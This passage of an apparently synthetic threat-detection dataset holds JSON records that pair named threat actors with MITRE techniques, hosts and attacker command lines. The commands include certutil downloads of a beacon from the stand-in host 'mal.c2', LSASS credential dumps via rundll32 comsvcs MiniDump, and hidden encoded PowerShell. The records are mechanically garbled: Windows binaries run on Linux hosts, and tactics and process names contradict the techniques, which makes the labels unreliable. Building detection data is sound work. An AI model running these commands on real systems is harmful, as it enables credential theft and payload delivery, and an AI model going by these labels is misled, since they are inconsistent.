aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-18T20:05:15.000Z","user":{"name":"svc_co6y1kmpttgn","sid":"S-1-5-21-148769949-691674863-6617"}}
|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20260131T191000000Z_0000649","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.94.106.110","name":"AZURE-VM-S56T4PH4KJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"649Mustang PandaT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.112.49.166","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-26T05:35:57.000Z","user":{"name":"svc_dac867e059c0","sid":"S-1-5-21-744708632-789167794-2034"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Privilege Escalation"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20260329T083549000Z_0000651","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.49.106.197","name":"APP-WEB-V7A69QRSAH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"651APT41T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.170.132.160","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1566 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-12-17T01:05:10.000Z","user":{"name":"azuread\\jky1ezlchr6r","sid":"S-1-5-21-812972512-940479531-2595"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20250121T180549000Z_0000653","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.194.166.50","name":"AZURE-VM-92ITZ9414Q","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"653FIN7T1546.003"},"network":{"domain":"github.com","dst_ip":"1.102.222.91","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-10T14:25:15.000Z","user":{"name":"azuread\\2bg9s9kn943a","sid":"S-1-5-21-748191947-173267782-5338"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Impact","Privilege Escalation"],"technique_id":"T1570"},"event_id":"evt_lapsus_20261004T155804000Z_0000655","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.22.177.230","name":"APP-WEB-UX9VQQYX3P","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"655Lapsus$T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.39.224.39","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-05T10:00:21.000Z","user":{"name":"azuread\\fe64dxkpysig","sid":"S-1-5-21-211704455-199321368-7222"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Collection"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20250313T034843000Z_0000657","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.104.207.244","name":"WIN-FIN-SRV-VBLG9QI9SD","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"657Scattered SpiderT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.88.232.207","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-09-19T18:34:12.000Z","user":{"name":"azuread\\1iotfqwi45z6","sid":"S-1-5-21-920449118-431177578-3635"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement","Execution"],"technique_id":"T1531"},"event_id":"evt_lapsus_20250705T142649000Z_0000659","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.3.69.148","name":"EC2-INST-59FFSLX0DB","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"659Lapsus$T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.179.162.153","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-05T03:45:28.000Z","user":{"name":"azuread\\ns3g50rrhocv","sid":"S-1-5-21-268335125-249148894-2004"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20251009T001825000Z_0000661","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.43.52.67","name":"DB-ORACLE-QYIOL4F4HT","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"661Volt TyphoonT1570"},"network":{"domain":"github.com","dst_ip":"1.7.128.48","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-06T01:47:19.000Z","user":{"name":"svc_4xs7xfc0ngzm","sid":"S-1-5-21-131724382-665357745-9573"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20260622T163611000Z_0000663","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.16.45.84","name":"AZURE-VM-4R1W4ZWS5Y","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"663Volt TyphoonT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.174.79.195","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1600 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-21T03:56:27.000Z","user":{"name":"i-brivq71ox8fz","sid":"S-1-5-21-673959568-919330436-7638"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Impact"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20250827T011243000Z_0000665","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.75.252.231","name":"IAM-ROLE-IX1F6IBZ9O","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"665APT41T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.4.61.164","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-07-22T15:23:55.000Z","user":{"name":"svc_vuj2f414yof7","sid":"S-1-5-21-115005184-160673026-9628"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement","Command and Control","Persistence"],"technique_id":"T1531"},"event_id":"evt_unc4841_20250301T223706000Z_0000667","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.230.216.92","name":"WIN-FIN-SRV-BYYIX1M2VY","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"667UNC4841T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.19.166.136","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2986 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-05-26T18:26:08.000Z","user":{"name":"svc_ii2deif19ygi","sid":"S-1-5-21-783679116-434140594-1702"}}
|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Exfiltration","Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20251018T070953000Z_0000669","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.157.156.219","name":"EC2-INST-K402DQ65LS","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"669Mustang PandaT1021.006"},"network":{"domain":"github.com","dst_ip":"1.80.196.25","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-07-27T23:02:40.000Z","user":{"name":"arn:aws:iam::gpxjpz4lgc8f","sid":"S-1-5-21-159840750-613903799-8068"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20260722T213938000Z_0000671","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.220.22.63","name":"WIN-FIN-SRV-SV1Q67W13I","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"671Lapsus$T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.52.173.184","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-05-07T15:17:01.000Z","user":{"name":"azuread\\wzra875l6efb","sid":"S-1-5-21-124352144-268646792-4990"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection","Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20261212T211026000Z_0000673","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.4.101.136","name":"WIN-FIN-SRV-BZKUAQGG2B","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"673Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.83.95.79","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-08-06T17:14:24.000Z","user":{"name":"azuread\\wsr7vuevfzu9","sid":"S-1-5-21-521971821-746582717-2891"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20251202T033159000Z_0000675","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.70.210.132","name":"WIN-FIN-SRV-TLNWHP5OP1","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"675UNC4841T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.163.68.69","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-08-15T19:30:01.000Z","user":{"name":"azuread\\69wvd6vbg93b","sid":"S-1-5-21-664619884-309146135-7645"}}
|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection","Execution","Persistence"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20250919T034408000Z_0000677","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.21.51.44","name":"AZURE-VM-Z28KHI603G","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"677Mustang PandaT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.60.244.12","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-26T08:09:36.000Z","user":{"name":"arn:aws:iam::ise8zdixp78w","sid":"S-1-5-21-693359746-419277794-6084"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access","Execution"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20250924T003927000Z_0000679","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.82.212.140","name":"APP-WEB-PKR1XTNPJJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"679Lapsus$T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.161.121.153","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-05T14:01:51.000Z","user":{"name":"svc_otgtow3ii7ha","sid":"S-1-5-21-524967024-798680835-5196"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Impact"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20250920T132237000Z_0000681","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.242.99.179","name":"WIN-FIN-SRV-GJMZ5Z0C6G","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"681FIN7T1566.001"},"network":{"domain":"github.com","dst_ip":"1.154.52.76","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-09T02:52:38.000Z","user":{"name":"CORP\\1zjhq9yqgl10","sid":"S-1-5-21-229768825-420071405-3248"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20260113T175323000Z_0000683","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.25.252.204","name":"DB-ORACLE-HPBC88O1WS","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"683Lapsus$T1021.006"},"network":{"domain":"github.com","dst_ip":"1.122.190.108","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-10-10T10:07:17.000Z","user":{"name":"azuread\\z45tcxrl0dpy","sid":"S-1-5-21-975845812-175533307-8296"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20250723T213440000Z_0000685","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.134.136.191","name":"APP-WEB-O5YRC687L2","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"685FIN7T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.123.20.145","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2143 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-02-25T14:47:13.000Z","user":{"name":"CORP\\azcro44cij3y","sid":"S-1-5-21-296649046-161967171-7230"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20251014T215553000Z_0000687","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.233.27.215","name":"EC2-INST-NDL15IUQPD","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"687FIN7T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.72.73.33","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1659 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-24T21:29:10.000Z","user":{"name":"CORP\\ztlurzhov7y2","sid":"S-1-5-21-534689114-553123547-1959"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact","Credential Access","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20261006T022459000Z_0000689","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.109.202.124","name":"EC2-INST-SI1GUVELG2","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"689Volt TyphoonT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.169.100.124","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-07T20:56:46.000Z","user":{"name":"svc_yqtpla788dhc","sid":"S-1-5-21-489658583-683526648-1174"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20251007T114722000Z_0000691","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.6.121.188","name":"IAM-ROLE-L5QD7CSFUS","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"691Volt TyphoonT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.142.74.200","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 928 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-04T21:12:47.000Z","user":{"name":"svc_xdt1x94p5xsv","sid":"S-1-5-21-606568787-537952445-6756"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access","Impact","Discovery"],"technique_id":"T1570"},"event_id":"evt_fin7_20260902T041144000Z_0000693","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.26.78.6","name":"IAM-ROLE-SX7E3092MS","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"693FIN7T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.28.224.128","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-12T08:58:48.000Z","user":{"name":"CORP\\o729mbugufaj","sid":"S-1-5-21-261847237-580959781-2453"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20260506T095928000Z_0000695","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.205.90.17","name":"APP-WEB-JU9D6P8N9E","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"695Scattered 